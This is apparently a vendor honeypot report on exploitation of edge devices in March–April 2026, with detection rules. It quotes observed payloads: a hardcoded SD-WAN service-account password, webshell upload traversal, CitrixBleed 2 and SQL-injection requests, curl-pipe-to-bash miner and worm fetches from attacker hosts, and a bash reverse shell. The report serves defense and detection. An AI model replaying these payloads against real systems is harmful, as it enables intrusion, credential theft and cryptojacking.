
Edge Device Exploit Trends: Honeypot Analysis

Data: Defused Cyber honeypot telemetry (25 decoy types)  ·  Period: Mar 14 – Apr 13, 2026  ·  15,001 exploit attempts  ·  Generated: 2026-04-13

15.0k exploit attempts  ·  25 decoy types  ·  40+ CVEs targeted  ·  1,260 SD-WAN chain  ·  8,112 CitrixBleed 2  ·  514 shell eval payloads

Detection Chokepoint Framework

Every exploit in this dataset (Cisco SD-WAN, Citrix, SonicWall, Fortinet) follows the same chain. The CVE changes. The tooling changes. The five stages don't. Each badge maps to the ATT&CK technique you're detecting at that stage.

1. Recon / Fingerprint (T1595 RECON): scanners probe for version, endpoint presence
2. Auth bypass / Memory leak (T1190 AUTH BYPASS): exploit hits auth endpoint to gain access or leak tokens
3. Credential / Config harvest (T1555 CRED HARVEST): read DCA creds, session tokens, admin configs
4. Webshell / Payload deploy (T1505 WEBSHELL): upload .war, drop shell, path-traversal write
5. Post-exploit (T1059 POST-EXPLOIT): cryptominer, reverse shell, lateral movement

Authentication bypass, credential harvest, and webshell deployment: those three stages are where your detection budget compounds. Recon scanning generates volume but the attacker can change tools and IPs freely. Post-exploit behavior matters but varies by environment. The middle three are the invariants.

Monthly Volume: Daily Exploit Attempts

Daily hit volume across 22 decoy types. The spikes aren't gradual trends. They're specific campaigns lighting up.

[Chart: Daily exploit attempts, Mar 14 to Apr 13, 2026]
Three stories dominate this window. April 6 was the peak day at 1,862 hits, driven almost entirely by CitrixBleed 2 with new operators joining daily. April 2 (1,807) and April 9 (1,018) were close behind. March 17 (1,194) was a concentrated SD-WAN burst. The new story: SAP lit up Apr 9–11 with a 1,024-hit burst on a 4-year-old CVSS 10.0 vulnerability, 176 unique IPs in 72 hours. CitrixBleed 2 now accounts for 54% of all traffic in this window, and the operator count keeps growing.

Target Distribution: What Adversaries Are Hunting

Not every decoy gets the same attention. Citrix and SD-WAN absorb 74% of all traffic, and for different reasons.

Citrix NetScaler        8,662
Cisco SD-WAN            1,260
SAP Netweaver           1,179
FortiWeb                1,027
React Server              818
Ivanti Connect Secure     734
SonicWall SMA             478
FortiClient EMS           291

Citrix dominates at 8,662 hits, 57.7% of all traffic, driven by a concentrated cluster of IPs running CitrixBleed 2 continuously. SAP jumped to third this window (was barely visible before). A 72-hour burst Apr 9–11 on a 4-year-old CVSS 10.0 vuln accounted for most of it. SonicWall has the most distributed attacker base at 284 unique IPs, suggesting toolkit proliferation rather than a single operator campaign.

CVE-2026-20127: Full Kill Chain in Honeypot Data

CVSS 10.0 authentication bypass in Cisco Catalyst SD-WAN. Disclosed Feb 25, 2026. CISA KEV with 24-hour remediation. We captured the full attack chain: 137 IPs progressing from recon through auth bypass, webshell upload, and cryptominer deployment.

Attack Chain Stages: Observed in Honeypot

Stage   Alert                           Hits   Unique IPs  Key Artifact
RECON   Associated with CVE-2026-20127  2,475  189         cmd.jsp probe, .dca credential read
AUTH    CVE-2026-20127 [First Part]     664    123         POST /jts/authenticated/j_security_check
UPLOAD  CVE-2026-20127 [Upload]         111    44          Path traversal → .war webshell deploy
EXEC    Webshell command execution      1,780  -           POST /cmd.gz/cmd.jsp

Auth Bypass: Hardcoded DCA Credentials

The "First Part" stage sends authentication requests using the viptela-reserved-dca service account, a default internal account used by the Data Collection Agent.

    # Auth bypass via default service account
    POST /jts/authenticated/j_security_check
    Content-Type: application/x-www-form-urlencoded
    User-Agent: python-requests/2.32.5

    j_username=viptela-reserved-dca&j_password=9i9Q6TE1TYVMdUu6ULw9W5kkSoaP6Czk

Webshell Upload: Path Traversal to Wildfly

Post-authentication, attackers exploit the /dataservice/smartLicensing/uploadAck endpoint to upload .war files via path traversal into the Wildfly deployment directory.

    # Webshell upload via path traversal
    POST /dataservice/smartLicensing/uploadAck
    Content-Type: multipart/form-data

    filename="../../../../../../../../../../../var/lib/wildfly/standalone/deployments/cmd.gz.war"

Webshell Commands: Post-Exploit Activity

Once the webshell is deployed at /cmd.gz/cmd.jsp, attackers execute commands through POST requests. The command breakdown reveals a clear operational progression: enumeration → miner deployment → persistence.

Count  Purpose                           Command
819    User context check                id
372    MINER: custom kernel payload      curl -s -Lk hxxps[://]103[.]98[.]152[.]233/wp_plugins/kernel.sh | bash
196    User context check                whoami
37     MINER: XMRig via MoneroOcean      curl -s -L hxxps[://]raw[.]githubusercontent[.]com/.../setup_moneroocean_miner.sh | bash
15     BOTNET: unknown payload           curl -sLk hxxp[://]83[.]142[.]209[.]47/x | bash
10     BOTNET: compromised WP staging    curl -s -Lk hxxps[://]miso88[.]tech/wp-config/x | bash
6      RECON: full system enumeration    uname -a;cat /etc/shadow;cat /etc/passwd;ifconfig -a;...
5      C2: Global Socket reverse shell   gs-netcat_linux-x86_64 -s kikdddsdsrrds -l -i

Most of this is cryptomining. Watch the outliers. 819 id commands, 372 XMRig deployments: noisy, opportunistic, easy to catch. But 6 IPs ran full system enumeration and 5 deployed gs-netcat reverse shells. Those are the ones that matter.

Credential Harvesting: DCA Config Files

739 requests targeted the .dca (Data Collection Agent) configuration file. This file contains credentials used by the DCA service to authenticate to vManage. Harvesting this file gives attackers legitimate credentials for lateral movement within the SD-WAN fabric.

CVE-2025-5777: CitrixBleed 2 (T1190 Pre-Auth Memory Disclosure)

Same vulnerability class as the original CitrixBleed that hit Boeing and ICBC. Pre-auth memory disclosure, ~127 bytes per request, session tokens leak out. The exploit is trivial: a 5-byte POST body with the word login. This window: 8,112 hits, 54% of all traffic, still growing.

Exploitation Pattern

All 8,112 hits target a single endpoint: POST /p/u/doAuthentication.do with a malformed login parameter (no equals sign or value). 97% of traffic uses an identical truncated User-Agent string, indicating a shared exploit toolkit spreading to new operators.

    # CitrixBleed 2 memory leak exploit
    POST /p/u/doAuthentication.do HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 5

    login

New operators every day, same toolkit. 163[.]245[.]210[.]213 leads at 2,136 hits across this window, grinding continuously. 91[.]92[.]243[.]126 (1,558) and 91[.]92[.]243[.]11 (1,129) are in the same /24 running in parallel. 69[.]169[.]107[.]93 (691), 64[.]20[.]48[.]21 (502), and 178[.]16[.]55[.]226 (452) all appeared in the Apr 2–6 burst. Apr 6 (1,726 CitrixBleed 2 hits) is the new single-day peak. This isn't one campaign. It's a toolkit that anyone can pick up.

CitrixBleed 2 Daily Exploitation Trend

[Chart: CVE-2025-5777 daily exploitation, Mar 14 to Apr 13, 2026]

CVE-2022-22536 + CVE-2025-31324: SAP Surge (Apr 9–11)

SAP jumped from a footnote to the third most targeted platform in this window. 1,179 total hits on SAP Netweaver decoys, driven by a concentrated 72-hour burst Apr 9–11 on CVE-2022-22536, a 2022 CVSS 10.0 memory corruption / request smuggling vulnerability in SAP ICM. An additional 155 hits targeted CVE-2025-31324, the critical SAP NetWeaver Visual Composer RCE disclosed in 2025.

CVE-2022-22536: 4-Year-Old CVSS 10.0 Still Under Active Exploitation

The Apr 9–11 burst hit 176 unique IPs in three days: concentrated scanning across a wide source range rather than a single operator. CVE-2022-22536 allows unauthenticated HTTP request smuggling against SAP ICM, enabling memory disclosure and session token theft without credentials. Patched in 2022. Still getting 1,024 hits in a 31-day window in 2026.

Date     Hits  CVE             Notes
Apr 9    337   CVE-2022-22536  Burst begins. 176 unique IPs
Apr 10   621   CVE-2022-22536  Peak day. Scanning at scale
Apr 11   66    CVE-2022-22536  Tail-off
Various  155   CVE-2025-31324  SAP NetWeaver Visual Composer RCE

Old CVEs don't retire. They get rediscovered. CVE-2022-22536 is 4 years old, CVSS 10.0, and requires no credentials. The Apr 9–11 burst pattern (176 IPs, 958 hits in 48 hours, then gone) matches a coordinated scanning campaign, not opportunistic noise. CVE-2019-11510 (Pulse Secure, 7 years old) and CVE-2018-13379 (FortiGate, 8 years old) also appear in this dataset. Patch age is not a proxy for exploitation risk.

CVE-2025-40599: SonicWall SMA Path Traversal + Self-Replicating Worm

478 attempts across 284 unique IPs targeting SonicWall SMA decoys via double-encoded path traversal to reach /bin/sh. Every request uses the libredtail-http User-Agent, a custom HTTP client not seen in any other campaign. 284 unique IPs is the most distributed attacker base of any campaign in this dataset.

    # Path traversal to shell + self-replicating worm payload
    POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh
    User-Agent: libredtail-http
    Content-Type: text/plain

    (wget --no-check-certificate -qO- hxxps[://]31[.]57[.]216[.]121/sh || curl -sk hxxps[://]31[.]57[.]216[.]121/sh) | sh -s apache.selfrep

apache.selfrep: this payload spreads itself. The script takes apache.selfrep as an argument, with self-replication logic baked into the payload. The same staging IP (31[.]57[.]216[.]121) appears in both the SonicWall path traversal and the "Shell eval!" alerts across Ivanti, Citrix, and FortiClient EMS decoys, confirming a single worm operator targeting multiple edge device families simultaneously. All 30 shell eval hits still point to this same IP. The worm infrastructure remains active for the entire 31-day observation period.

CVE-2025-25257: FortiWeb Multi-Stage SQLi via Bearer Token

237 requests targeting FortiWeb's /api/fabric/device/status endpoint. Attackers embed SQL injection payloads inside the Authorization: Bearer header, an unusual injection point that bypasses WAF rules typically inspecting query parameters and POST bodies.

CVE-2026-21643: FortiClient EMS SQLi, New Operator Fingerprint (Apr 2)

FortiClient EMS SQLi jumped from 159 to 187 hits (+28 on Apr 2). A new operator fingerprint emerged: payloads containing alireza_cve_2026_21643_test appeared alongside the existing nuclei_cve_2026_21643_test pattern.

    # New operator fingerprint: alireza variant (first seen Mar 29)
    GET /api/v1/init_consts HTTP/1.1
    User-Agent: python-requests/2.31.0
    Site: x'; SELECT CAST('alireza_cve_2026_21643_test' AS int)--

    # Original Nuclei operator (ongoing since March)
    GET /api/v1/init_consts HTTP/1.1
    User-Agent: Mozilla/5.0 (Ubuntu; Linux i686; rv:125.0)
    Site: x'; SELECT CAST('nuclei_cve_2026_21643_test' AS int)--

Attack Progression

Step  Payload (in Bearer token)                                                     Purpose
1     bitsight-internet-census' or 'x'='x                                           Auth bypass / boolean blind SQLi test
2     SELECT a FROM fabric_user.a INTO OUTFILE '/var/log/lib/python3.10/pylab.py'  Write webshell via SQL INTO OUTFILE
3-6   UPDATE a SET a=(SELECT CONCAT(a, 0x...))                                      Staged hex payload assembly into DB field

Bearer headers are a WAF blind spot. Most rules inspect URI paths, query strings, and POST bodies. The Authorization header gets passed through uninspected. The webshell lands in /var/log/lib/python3.10/pylab.py, a Python library path that won't trigger file integrity monitoring. If you're not inspecting auth headers for SQL metacharacters, you're missing this entire class.

CVE-2026-1281 / CVE-2026-1340: Ivanti EPMM Reverse Shell (Apr 3)

5 requests on Apr 3 targeting Ivanti EPMM via the /mifs/c/appstore/fob/ endpoint. The payload embeds a bash reverse shell directly in the URL path using backtick command injection inside the sha256 hash parameter.

    # Decoded URI: reverse shell injected into app store download path
    GET /mifs/c/appstore/fob/3/5/sha256:kid=1,st=theValue,et=1337133713,h=gPath[`bash -i >& /dev/tcp/5[.]255[.]120[.]46/5555 0>&1`]/13371337-1337-1337-1337-133713371337.ipa
    # C2 callback: 5[.]255[.]120[.]46:5555
    # Source IPs: 147[.]185[.]135[.]0/24 range (3 IPs), 185[.]190[.]141[.]49

PoC testing, not a mature campaign. Three IPs in the same /24, 1337 repeating in the GUID and epoch. This is someone running a proof of concept. The actionable IOC is 5[.]255[.]120[.]46:5555. Any outbound connection from an EPMM host to that address is confirmed compromise.

CVE-2019-19781: 6-Year-Old Citrix Vuln Still Getting Probed (Apr 3)

2 hits probing for CVE-2019-19781, a path traversal in Citrix ADC first disclosed December 2019. This CVE is 6+ years old and still being actively probed, reinforcing that edge device vulnerabilities have extremely long exploitation tails.

CVE-2025-64446: FortiWeb API Path Traversal (Apr 2 Spike)

FortiWeb path traversal exploitation jumped to 63 hits, with 22 new attempts on Apr 2 from two IPs in the same 101[.]71[.]38[.]0/24 netblock. The exploit abuses URL-encoded %3f (question mark) in the API path to traverse to /cgi-bin/fwbcgi.

    # FortiWeb API path traversal via encoded ? character
    GET /api/v2.0/cmdb/system/admin%3f/../../../../../cgi-bin/fwbcgi HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
    Accept: application/json, text/javascript, */*; q=0.01
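Both the SonicWall request (.%2e segments) and this FortiWeb request (an encoded ? followed by ../ segments) hide traversal behind percent-encoding, so a rule that only looks for a literal ../ in the raw request line misses them. The Python below is an added example written for this page, not code from the report or from either vendor: it decodes a request path repeatedly (to unwrap double encoding), counts parent-directory segments after decoding, notes whether the traversal climbs above the URL root, and flags an encoded question mark inside the path. The two observed paths are taken from the page; the benign and double-encoded sample paths are constructed.

```python
from urllib.parse import unquote

MAX_DECODE_PASSES = 3  # enough to unwrap double encoding without looping on hostile input

# Observed paths from the page plus constructed benign / double-encoded cases
SAMPLE_PATHS = [
    "/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh",   # SonicWall SMA (observed)
    "/api/v2.0/cmdb/system/admin%3f/../../../../../cgi-bin/fwbcgi",      # FortiWeb (observed)
    "/static/%252e%252e/%252e%252e/etc/passwd",                          # constructed: double-encoded
    "/api/v2.0/cmdb/system/admin",                                       # constructed: benign
]


def fully_decode(text):
    """Percent-decode until the string stops changing (bounded number of passes)."""
    for _ in range(MAX_DECODE_PASSES):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def analyze_path(raw_path):
    """Return a dict describing traversal indicators in one request path."""
    decoded = fully_decode(raw_path)
    # Deliberately do NOT split on '?': a backend that treats the decoded '?' as the
    # start of the query string is exactly the confusion the FortiWeb request relies on.
    depth = min_depth = dotdot = 0
    for seg in decoded.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            dotdot += 1
            depth -= 1
            min_depth = min(min_depth, depth)
        else:
            depth += 1
    double_encoded = unquote(raw_path) != decoded
    encoded_query_char = "%3f" in raw_path.lower()
    reasons = []
    if dotdot:
        reasons.append(f"{dotdot} parent-directory segments after decoding")
    if min_depth < 0:
        reasons.append("traversal climbs above the URL root")
    if double_encoded:
        reasons.append("double percent-encoding")
    if encoded_query_char:
        reasons.append("encoded '?' inside the path")
    return {
        "raw": raw_path,
        "decoded": decoded,
        "dotdot_count": dotdot,
        "escapes_root": min_depth < 0,
        "double_encoded": double_encoded,
        "encoded_query_char": encoded_query_char,
        # Any '..' segment in an API path is anomalous on these appliances
        "flagged": dotdot > 0,
        "reasons": reasons,
    }


def scan(paths):
    """Analyze many paths and keep only the flagged ones."""
    return [r for r in map(analyze_path, paths) if r["flagged"]]


if __name__ == "__main__":
    for hit in scan(SAMPLE_PATHS):
        print(hit["raw"], "->", hit["decoded"], "|", "; ".join(hit["reasons"]))
```

Note that the FortiWeb path never climbs above the root: five segments up, five segments down. The signal there is the presence of any parent-directory segment in an API path plus the encoded question mark, which is why the example flags on the dot-dot count rather than on root escape alone.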

Attacker Tooling: Scanner & Automation Fingerprints

38.7% of traffic self-identifies via User-Agent. That's the floor. The other 61% spoof browser UAs but behave like bots.

python-requests    3,088
libredtail-http      442
Go-http-client       307
l9scan (LeakIX)       57
curl                  49
ffuf                  14

python-requests dominates at 78% of scanner-attributed traffic. libredtail-http is exclusively associated with the SonicWall worm campaign.

Multi-Device Operators: IPs Scanning Across Decoy Types

IP                    Hits  Products Targeted                                     Significance
47[.]253[.]5[.]130    13    Cisco SD-WAN, Citrix, FortiClient, Ivanti, SonicWall  MULTI-EXPLOIT: broadest coverage
144[.]31[.]4[.]70     53    Citrix, FortiGate, FortiWeb, Palo Alto, SolarWinds    MULTI-EXPLOIT: Fortinet-heavy
82[.]165[.]66[.]87    23    Citrix, FortiClient, Ivanti, SonicWall                MULTI-EXPLOIT: shell eval across all
103[.]98[.]152[.]233  327   Cisco SD-WAN (primary)                                MINER OPS: kernel.sh staging host
176[.]65[.]139[.]31   336   Cisco SD-WAN (primary)                                MINER OPS: full chain auth→upload→mine

Staging Infrastructure

Payload staging URLs extracted from webshell commands and shell eval payloads.

URL / IP                                                      Payloads  Type           Blind Spot
103[.]98[.]152[.]233/wp_plugins/kernel.sh                     386       MINER          Path mimics WordPress plugin directory
31[.]57[.]216[.]121/sh                                        687+      WORM           Self-replicating apache.selfrep payload
raw[.]githubusercontent[.]com/.../setup_moneroocean_miner.sh  37        MINER          Legitimate GitHub hosting. Cannot block domain
83[.]142[.]209[.]47                                           25        BOTNET         Serves nullnet_bash.sh. Botnet enrollment
miso88[.]tech/wp-config/x                                     10        BOTNET         Compromised domain, WP config path
213[.]139[.]77[.]117:4433                                     10        C2 CHECK       Port 4433 callback. Connectivity test before C2
5[.]255[.]120[.]46:5555                                       5         REVERSE SHELL  Ivanti EPMM bash reverse shell target (Apr 3)

You can't block GitHub. Detection has to be contextual. A network appliance fetching shell scripts from raw.githubusercontent.com and piping to bash is anomalous regardless of the domain reputation.

Detection Recommendations

Each detection maps to the technique it catches. The ones that survived every CVE rotation in this dataset are at the top.

T1190: Detect SD-WAN auth bypass via default service accounts

Alert on authentication attempts using viptela-reserved-dca or any viptela-reserved-* account from external IPs. These are internal service accounts. External auth requests are always malicious.

Observed payloads (1)

    # 664 hits, 123 unique IPs. Default DCA service account, external source.
    POST /jts/authenticated/j_security_check HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: python-requests/2.32.5

    j_username=viptela-reserved-dca&j_password=9i9Q6TE1TYVMdUu6ULw9W5kkSoaP6Czk

Example detection logic

    # Sigma-style detection
    title: Cisco SD-WAN Auth Bypass via Default DCA Account
    logsource:
      category: webserver
      product: cisco_sdwan
    detection:
      selection:
        cs-uri-stem|contains: '/jts/authenticated/j_security_check'
        request_body|contains: 'viptela-reserved-dca'
      filter_internal:
        src_ip|cidr:
          - '10.0.0.0/8'
          - '172.16.0.0/12'
          - '192.168.0.0/16'
      condition: selection and not filter_internal
    level: critical

T1505: Detect webshell upload via Wildfly deployment path traversal

Monitor for multipart uploads containing path traversal sequences targeting /var/lib/wildfly/standalone/deployments/.

Observed payloads (1)

    # 111 upload attempts, 44 unique IPs. Path traversal deploys .war webshell at /cmd.gz.
    POST /dataservice/smartLicensing/uploadAck HTTP/1.1
    Content-Type: multipart/form-data

    filename="../../../../../../../../../../../var/lib/wildfly/standalone/deployments/cmd.gz.war"

Example detection logic

    # Sigma-style: Webshell upload to Wildfly
    title: SD-WAN Webshell Upload via Path Traversal
    logsource:
      category: webserver
    detection:
      selection_endpoint:
        cs-uri-stem|contains: '/dataservice/smartLicensing/uploadAck'
        cs-method: 'POST'
      selection_traversal:
        request_body|contains:
          - '../../../'
          - 'deployments/'
          - '.war'
      condition: selection_endpoint and selection_traversal
    level: critical

T1190: Detect CitrixBleed 2 memory leak exploitation

The exploit signature is highly specific: POST /p/u/doAuthentication.do with a body containing only login (no equals sign, no value). Legitimate authentication always includes login=username. Near-zero false positive potential.

Observed payloads (1)

    # 8,112 hits, 54% of all traffic. 5-byte body, malformed login parameter.
    POST /p/u/doAuthentication.do HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 5

    login

Example detection logic

    # Sigma-style: CitrixBleed 2 memory disclosure
    title: Citrix NetScaler CVE-2025-5777 Memory Leak Attempt
    logsource:
      category: webserver
      product: citrix_netscaler
    detection:
      selection:
        cs-uri-stem: '/p/u/doAuthentication.do'
        cs-method: 'POST'
        sc-bytes|lt: 20
      condition: selection
    level: critical
    falsepositives:
      - None expected. Legitimate auth always includes credentials

T1190: Detect SQL injection in Authorization headers

The FortiWeb campaign embeds SQLi in Bearer tokens, a common WAF bypass. Inspect Authorization headers for SQL metacharacters.

Observed payloads (3)

    # FortiWeb Bearer-token SQLi: auth bypass probe (boolean blind).
    GET /api/fabric/device/status HTTP/1.1
    Authorization: Bearer bitsight-internet-census' or 'x'='x

    # FortiWeb Bearer-token SQLi: webshell drop via INTO OUTFILE.
    GET /api/fabric/device/status HTTP/1.1
    Authorization: Bearer ' UNION SELECT a FROM fabric_user.a INTO OUTFILE '/var/log/lib/python3.10/pylab.py'--

    # FortiClient EMS SQLi: operator-fingerprint variant (Site header).
    GET /api/v1/init_consts HTTP/1.1
    User-Agent: python-requests/2.31.0
    Site: x'; SELECT CAST('alireza_cve_2026_21643_test' AS int)--

Example detection logic

    # Sigma-style: SQLi via Authorization header
    title: SQL Injection in HTTP Authorization Header
    logsource:
      category: webserver
    detection:
      selection:
        cs-authorization|contains:
          - 'SELECT'
          - 'UNION'
          - 'INTO OUTFILE'
          - 'CONCAT'
          - '/**/'
          - "' or '"
      condition: selection
    level: high

T1059: Detect edge devices fetching scripts and piping to shell

Network appliances should not execute wget|curl ... | sh chains. Monitor for outbound HTTP(S) from edge device management IPs followed by shell execution.

Observed payloads (5)

    # 372 hits. XMRig miner delivery via direct-IP staging host.
    curl -s -Lk hxxps[://]103[.]98[.]152[.]233/wp_plugins/kernel.sh | bash

    # 37 hits. MoneroOcean miner via legitimate-looking GitHub raw path.
    curl -s -L hxxps[://]raw[.]githubusercontent[.]com/.../setup_moneroocean_miner.sh | bash

    # 15 hits. Unknown botnet payload over HTTP.
    curl -sLk hxxp[://]83[.]142[.]209[.]47/x | bash

    # 10 hits. Compromised WordPress site hosting second-stage dropper.
    curl -s -Lk hxxps[://]miso88[.]tech/wp-config/x | bash

    # SonicWall worm: self-replicating payload with wget/curl fallback.
    (wget --no-check-certificate -qO- hxxps[://]31[.]57[.]216[.]121/sh || curl -sk hxxps[://]31[.]57[.]216[.]121/sh) | sh -s apache.selfrep

Example detection logic

    # Sigma-style: Edge device pipe-to-shell
    title: Edge Device Fetches Remote Script and Pipes to Shell
    logsource:
      category: process_creation
      product: linux
    detection:
      selection_fetch:
        CommandLine|contains:
          - 'wget'
          - 'curl'
      selection_pipe:
        CommandLine|contains:
          - '| sh'
          - '| bash'
          - '| /bin/sh'
      filter_package_managers:
        ParentImage|endswith:
          - '/apt'
          - '/yum'
          - '/dnf'
      condition: selection_fetch and selection_pipe and not filter_package_managers
    level: high

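The pipe-to-shell rule above, carried through in Python as an added example (not code from the report or from any of the vendors named on this page): it applies the same fetch-plus-pipe condition and package-manager parent filter to process-creation events, and additionally pulls the staging URL and the shell's trailing arguments out of the command line so the alert carries the IoC an analyst would block next. The event records are constructed and use RFC 5737 documentation addresses, not the page's staging hosts; the field names (host, parent, image, cmdline) are assumptions about the EDR schema.

```python
import re

# Constructed Linux process-creation events modelled on the page's observed commands.
# Hosts are RFC 5737 documentation addresses; field names assume a simple EDR schema.
SAMPLE_EVENTS = [
    {"host": "sdwan-vmanage-01", "parent": "/opt/wildfly/bin/standalone.sh", "image": "/bin/bash",
     "cmdline": "curl -s -Lk https://203.0.113.10/wp_plugins/kernel.sh | bash"},
    {"host": "sma-edge-02", "parent": "/usr/src/cgi-bin/sh", "image": "/bin/sh",
     "cmdline": "(wget --no-check-certificate -qO- https://198.51.100.5/sh "
                "|| curl -sk https://198.51.100.5/sh) | sh -s apache.selfrep"},
    {"host": "build-agent-07", "parent": "/usr/bin/apt", "image": "/bin/sh",
     "cmdline": "curl -fsSL https://example.invalid/install.sh | sh"},   # package manager parent
    {"host": "ems-01", "parent": "/usr/bin/cron", "image": "/usr/bin/curl",
     "cmdline": "curl -s https://203.0.113.10/health"},                 # fetch without a pipe
]

FETCH_RE = re.compile(r"\b(?:wget|curl)\b")
# '| sh', '| bash', '| /bin/sh', with optional trailing shell arguments (e.g. '-s apache.selfrep')
PIPE_TO_SHELL_RE = re.compile(r"\|\s*(?:/bin/)?(?:ba)?sh\b(.*)$")
URL_RE = re.compile(r"https?://[^\s'\"|)]+")
PACKAGE_MANAGERS = ("/apt", "/yum", "/dnf")


def classify(event):
    """Return an alert dict for a fetch-and-pipe-to-shell event, or None."""
    cmd = event["cmdline"]
    if not FETCH_RE.search(cmd):
        return None
    pipe = PIPE_TO_SHELL_RE.search(cmd)
    if pipe is None:
        return None
    # Same exclusion as the Sigma rule: scripted installs spawned by a package manager
    if event["parent"].endswith(PACKAGE_MANAGERS):
        return None
    return {
        "host": event["host"],
        "technique": "T1059",
        "staging_urls": sorted(set(URL_RE.findall(cmd))),
        "shell_args": pipe.group(1).strip(),
        "cmdline": cmd,
    }


def scan(events):
    """Run classify() over a batch of events and keep the alerts."""
    return [alert for alert in map(classify, events) if alert is not None]


if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert["host"], alert["staging_urls"], alert["shell_args"] or "-")
```

The staging URL list is what feeds the infrastructure table further down: one alert per host, with the host(s) fetched from as a separate field, lets you pivot from a single process event to every other appliance that pulled from the same server.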
INFRA: Monitor for DCA credential file access on SD-WAN

739 requests targeted the .dca config file path. Access to this file from any non-management IP indicates credential harvesting, the lateral movement enabler.

Observed payloads (2)

    # 739 hits. Direct .dca config read, credentials used by DCA service to auth to vManage.
    GET /data-collection-agent/.dca HTTP/1.1
    User-Agent: python-requests/2.32.5

    # Related probe for DCA config directory.
    GET /config/data-collection-agent/ HTTP/1.1
    User-Agent: python-requests/2.32.5

Example detection logic

    # Sigma-style: DCA credential file access
    title: Cisco SD-WAN DCA Config File Access
    logsource:
      category: webserver
      product: cisco_sdwan
    detection:
      selection:
        cs-uri-stem|contains:
          - '/data-collection-agent/.dca'
          - '/config/data-collection-agent/'
      condition: selection
    level: critical
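The five web-server rules in this section share one shape: match a URI, a method, a body fragment or a header, then exclude internal sources. The Python below is an added example, not code from the report or from any SIEM vendor, that implements all five as plain functions over request records and runs them against constructed sample traffic (RFC 5737 addresses; the DCA password is redacted in the sample). The record schema (src_ip, method, uri, body, headers) is an assumption, as is mapping the DCA file-access rule to T1555 per the framework at the top of the page. The CitrixBleed 2 check matches the body described in the prose (exactly the bare word login, no equals sign) rather than the byte-count proxy in the Sigma rule.

```python
import ipaddress

# Same private ranges as the Sigma filter_internal block
INTERNAL_NETS = tuple(ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16"))
# Metacharacters from the Authorization-header rule, compared case-insensitively
SQLI_MARKERS = ("SELECT", "UNION", "INTO OUTFILE", "CONCAT", "/**/", "' OR '")


def is_internal(src_ip):
    ip = ipaddress.ip_address(src_ip)
    return any(ip in net for net in INTERNAL_NETS)


def rule_dca_auth_bypass(r):
    # T1190: any viptela-reserved-* service account authenticating from outside
    return ("/jts/authenticated/j_security_check" in r["uri"]
            and "viptela-reserved-" in r["body"]
            and not is_internal(r["src_ip"]))


def rule_wildfly_upload(r):
    # T1505: multipart upload whose filename traverses into the Wildfly deployments directory
    return (r["method"] == "POST"
            and "/dataservice/smartLicensing/uploadAck" in r["uri"]
            and all(m in r["body"] for m in ("../../../", "deployments/", ".war")))


def rule_citrixbleed2(r):
    # T1190: body is the bare parameter name with no '=' and no value
    return (r["method"] == "POST"
            and r["uri"] == "/p/u/doAuthentication.do"
            and r["body"].strip() == "login")


def rule_authz_sqli(r):
    # T1190: SQL metacharacters inside the Authorization header (the WAF blind spot)
    auth = r["headers"].get("Authorization", "").upper()
    return any(m in auth for m in SQLI_MARKERS)


def rule_dca_file_access(r):
    # T1555: DCA credential file or its config directory read from a non-management IP
    return (("/data-collection-agent/.dca" in r["uri"] or "/config/data-collection-agent/" in r["uri"])
            and not is_internal(r["src_ip"]))


RULES = (
    ("T1190", "sdwan_default_dca_account_auth", "critical", rule_dca_auth_bypass),
    ("T1505", "sdwan_wildfly_webshell_upload", "critical", rule_wildfly_upload),
    ("T1190", "citrix_cve_2025_5777_memory_leak", "critical", rule_citrixbleed2),
    ("T1190", "sqli_in_authorization_header", "high", rule_authz_sqli),
    ("T1555", "sdwan_dca_config_file_access", "critical", rule_dca_file_access),
)


def evaluate(records):
    """Apply every rule to every request record; return one alert per match."""
    alerts = []
    for r in records:
        for technique, name, level, check in RULES:
            if check(r):
                alerts.append({"rule": name, "technique": technique, "level": level, "src_ip": r["src_ip"]})
    return alerts


def make(src_ip, method, uri, body="", **headers):
    return {"src_ip": src_ip, "method": method, "uri": uri, "body": body, "headers": headers}


# Constructed sample traffic modelled on the observed payloads above
SAMPLE_REQUESTS = [
    make("198.51.100.7", "POST", "/jts/authenticated/j_security_check",
         "j_username=viptela-reserved-dca&j_password=<redacted-in-example>"),
    make("10.20.0.5", "POST", "/jts/authenticated/j_security_check",        # internal: filtered
         "j_username=viptela-reserved-dca&j_password=<redacted-in-example>"),
    make("198.51.100.7", "POST", "/dataservice/smartLicensing/uploadAck",
         'filename="../../../../../var/lib/wildfly/standalone/deployments/cmd.gz.war"'),
    make("203.0.113.44", "POST", "/p/u/doAuthentication.do", "login"),
    make("203.0.113.45", "POST", "/p/u/doAuthentication.do", "login=alice&passwd=hunter2"),  # legitimate
    make("203.0.113.46", "GET", "/api/fabric/device/status",
         Authorization="Bearer bitsight-internet-census' or 'x'='x"),
    make("203.0.113.47", "GET", "/api/fabric/device/status",
         Authorization="Bearer eyJhbGciOiJIUzI1NiJ9.e30.constructed"),                       # ordinary token
    make("198.51.100.9", "GET", "/data-collection-agent/.dca"),
]

if __name__ == "__main__":
    for a in evaluate(SAMPLE_REQUESTS):
        print(a["level"].upper(), a["technique"], a["rule"], a["src_ip"])
```

Three of the eight sample requests are deliberately benign (an internal DCA login, a real Citrix login with credentials, an ordinary bearer token) and produce no alert, which is the property the prose claims for these chokepoints: the invariants are specific enough that the same rule stays quiet on legitimate traffic while every CVE in the dataset trips it.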